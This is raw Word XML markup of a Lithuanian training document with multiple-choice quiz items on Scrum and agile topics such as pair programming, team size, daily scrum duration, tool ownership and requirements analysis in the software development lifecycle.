          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1100" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId53" w:name="DefaultOcxName35" w:shapeid="_x0000_i1100"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atskiri komandos nariai, pagal susitarimą sprinto planavimo susitikime </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
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2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DAUG ŽMONIŲ MANO, KAD PROGRAMAVIMAS POROMIS (PAIR PROGRAMMING) MAŽINA KLAIDŲ SKAIČIŲ IR PALENGVINA KODO PRIEŽIŪRĄ. PROGRAMAVIMAS POROMIS - KAS TAI?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1103" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId54" w:name="DefaultOcxName48" w:shapeid="_x0000_i1103"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vienas komandos narys pateikia kodą, kad vėliau kitas galėtų jį peržiūrėti </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1106" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId55" w:name="DefaultOcxName117" w:shapeid="_x0000_i1106"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Du žmonės dalinasi viena darbo vieta (kompiuteriu) paprastai pasikeisdami paeiliui renka kodą ar atlieka veiksmus klaviatūra, kitas stebi, atkreipia dėmesį ir padeda pirmajam</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1109" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId56" w:name="DefaultOcxName215" w:shapeid="_x0000_i1109"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Kodas vienu metu rašomas dviejose eilutėse kad sumažinti klaidų skaičių</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
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3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OKS YRA REKOMENDUOJAMAS SCRUM KOMANDOS DYDIS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1112" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId57" w:name="DefaultOcxName29" w:shapeid="_x0000_i1112"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Nesvarbu, jei tik komandos nariai gali užtikrinti visas reikalingas funkcijas (doesn't matter, as long as the team is cross functional)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1115" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId58" w:name="DefaultOcxName111" w:shapeid="_x0000_i1115"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 9, plius/ minus 3 nariai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1118" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId59" w:name="DefaultOcxName28" w:shapeid="_x0000_i1118"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 10, plius/ minus 3 nariai, ar daugiau, jei komanda geografiškai nutolusi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1121" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId60" w:name="DefaultOcxName281" w:shapeid="_x0000_i1121"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 7 plius/ minus 2 nariai</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color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KOKIA KASDIENIO SCRUM SUSITIKIMO (DAILY SCRUM MEETING) TRUKMĖ (TIME-BOX)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1124" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId61" w:name="DefaultOcxName4911" w:shapeid="_x0000_i1124"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 5 minutės</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1127" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId62" w:name="DefaultOcxName492" w:shapeid="_x0000_i1127"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 10 minučių</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1130" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId63" w:name="DefaultOcxName1181" w:shapeid="_x0000_i1130"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> 15 minučių</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1133" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId64" w:name="DefaultOcxName2162" w:shapeid="_x0000_i1133"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiek kiek reikės </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>KAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>ATSAKO UŽ ĮRANKIŲ PASIRINKIMĄ IR KONFIGŪRAVIMĄ ORGANIZACIJOJE, KURI PRIPAŽĮSTA AGILE VERTYBES</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1136" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId65" w:name="DefaultOcxName191" w:shapeid="_x0000_i1136"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Komandos, kurios turėtų susiderinti tarpusavyje </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1139" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId66" w:name="DefaultOcxName192" w:shapeid="_x0000_i1139"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Scrum meistrai (ScrumMasters), kurie  turėtų susiderinti tarpusavyje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc10443987"/>
      <w:bookmarkStart w:id="209" w:name="_Toc13095536"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="210" w:name="_Toc13833430"/>
      <w:bookmarkStart w:id="211" w:name="_Toc14392461"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Analizuoti pateiktus reikalavimus, nustatant programos atitikimą reikalavimams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1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AS VYKSTA PROGRAMINĖS ĮRANGOS KŪRIMO CIKLO (angl. SOFTWARE DEVELOPMENT LIFECYCLE, SDLC) REIKALAVIMŲ SURINKIMO IR ANALIZĖS ETAPE?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1142" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId67" w:name="DefaultOcxName" w:shapeid="_x0000_i1142"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Klientas sumoka už numatytą darbų apimtį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1145" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId68" w:name="DefaultOcxName1" w:shapeid="_x0000_i1145"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Klientas išsako savo lūkesčius projekte</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1148" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId69" w:name="DefaultOcxName2" w:shapeid="_x0000_i1148"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Projekto komanda realizuoja kiekvieną reikalavimą programos kode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1151" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId70" w:name="DefaultOcxName47182" w:shapeid="_x0000_i1151"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> P</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rojekto vadovas samdo projekto komandą</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color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. REIKALAVIMŲ ANALIZĖ NEAPIMA JŲ ATSEKAMUMO.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1154" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId71" w:name="DefaultOcxName47181" w:shapeid="_x0000_i1154"/>
        </w:object>
      </w:r>
      <w:r w:rsidR="00670F46" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Taip,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>neapima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1157" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId72" w:name="DefaultOcxName47191" w:shapeid="_x0000_i1157"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>  Ne, apima.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
